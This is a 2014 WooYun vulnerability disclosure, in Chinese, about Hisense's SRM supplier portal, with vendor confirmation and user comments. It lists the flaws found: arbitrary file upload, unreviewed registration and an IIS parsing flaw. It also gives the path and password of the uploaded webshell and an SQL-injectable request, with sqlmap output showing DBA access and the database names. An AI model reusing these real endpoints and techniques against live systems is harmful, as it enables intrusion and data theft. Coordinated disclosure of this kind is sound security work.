当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082037

漏洞标题:海信集团某系统SQL注入超多库+多种姿势getshell

相关厂商:hisense.com

漏洞作者: 小胖子

提交时间:2014-11-05 11:04

修复时间:2014-12-20 11:06

公开时间:2014-12-20 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-05: 细节已通知厂商并且等待厂商处理中
2014-11-05: 厂商已经确认,细节仅向厂商公开
2014-11-15: 细节向核心白帽子及相关领域专家公开
2014-11-25: 细节向普通白帽子公开
2014-12-05: 细节向实习白帽子公开
2014-12-20: 细节向公众公开

简要描述:

路人甲

详细说明:

系统地址:http://srm.hisense.com:8001/SRMWeb/
SRM系统
首先在供应商注册处,可以有任意文件上传
http://srm.hisense.com:8001/SRMWeb/PreVendor/PreVendorRegist.aspx?Action=New
调查表上传存在任意文件上传

fanhui.png


然后 注册一个账户 居然不需要审核即可登录 账号 wooyun 密码 123456a

wooyun.png


fabu.png


登录之后有发布消息 发布消息处添加图片 存在IIS解析漏洞

upload.png


http://srm.hisense.com:8001/SRMWeb/UploadFile/WebHtmlEditorFile/77.asp;.jpg
密码cmder
然后拿到shell

shell.png


然后,在登陆的情况下,读公告,居然是存在注入的,抓读取包
http://srm.hisense.com:8001/SRMWeb/InnerPortal/noticeview.aspx?noticeid=1188

GET /SRMWeb/InnerPortal/noticeview.aspx?noticeid=1188 HTTP/1.1
Host: srm.hisense.com:8001
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1671.3 Safari/537.36
Referer: http://srm.hisense.com:8001/SRMWeb/InnerPortal/PortalIndex.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.6,en;q=0.4,th;q=0.2
Cookie: PHPStat_FT_abcfffgh=1415111081764; PHPStatCookie_Global_User_Id=14110422244210879234556084998683; PHPStat_RT_abcfffgh=1415111081764; PHPStat_MSRC_abcfffgh=%7Cmarket_type_free_search%7C%7Csogou%7Csite%253ahisense.com%2B%25e7%25b3%25bb%25e7%25bb%259f%7C%7C%7Cwww.sogou.com%7C%7Cpmf_from_free_search; PHPStat_MSRC_TYPE_abcfffgh=pmf_from_free_search; ASP.NET_SessionId=tgqispbcoesljy45yjiztgyb; ASPSESSIONIDQQDQRSRT=ELEFNFHAIKCLPOPDLAHAMJOC
X-Forwarded-For: 127.0.0.1


超多数据库

SQLIN.png


current schema (equivalent to database on Oracle): 'SRM'
[23:15:21] [INFO] testing if current user is DBA
current user is DBA: True
DBA权限

available databases [26]:
[*] CTXSYS
[*] DATACENTER
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SRM
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

漏洞证明:

见详细说明

修复方案:

注册需要审核,文件上传目录权限需要控制,参数过滤。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-11-05 11:59

厂商回复:

感谢您的安全报告,我们将尽快跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-05 11:15 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    ···汗 这是要爆海信菊花啊···

  2. 2014-11-05 11:33 | SuperRookie ( 实习白帽子 | Rank:39 漏洞数:7 | 求收编,本人会注入,会上传,会Xss,会破...)

    第一天 就是个分站弱口令 第二天 就是分站xss 第三天就是 sql分站 各种沦陷

  3. 2014-11-05 11:36 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    这傻子厂商很多漏洞都不修复

  4. 2014-11-05 11:38 | SuperRookie ( 实习白帽子 | Rank:39 漏洞数:7 | 求收编,本人会注入,会上传,会Xss,会破...)

    估计 这站 已经轮到黑产里了。 他们会重视的。

  5. 2014-11-05 12:57 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。听说这个站有奖励

  6. 2014-11-05 14:55 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @px1624 一台电视机咾